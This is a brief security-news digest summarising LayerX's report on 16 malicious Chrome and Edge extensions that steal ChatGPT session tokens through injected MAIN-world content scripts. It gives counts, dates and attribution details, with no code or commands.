A threat actor published 16 browser extensions to the official Chrome Web Store and Microsoft Edge Add-ons marketplace that are designed to steal users’ ChatGPT session authentication tokens. LayerX says the extensions inject MAIN-world content scripts into chatgpt.com to intercept and exfiltrate authorization headers and metadata, enabling persistent access to accounts while remaining within standard web behavior. #ChatGPT #LayerX
Keypoints
- A single threat actor published 16 extensions (15 on Chrome, 1 on Edge) marketed as ChatGPT enhancement and productivity tools.
- The extensions inject content scripts into chatgpt.com that execute in the MAIN JavaScript world to monitor outbound requests and capture authorization tokens.
- Captured session tokens, extension metadata, telemetry, and access tokens are exfiltrated to a remote server, enabling account access and behavioral profiling.
- The tools had over 900 combined downloads and were still available in official stores as of January 26, according to LayerX.
- LayerX links the extensions by shared code, icons, and publisher traits and warns MAIN-world execution makes detection difficult for traditional security tools.
Read More: https://www.securityweek.com/chrome-edge-extensions-caught-stealing-chatgpt-sessions/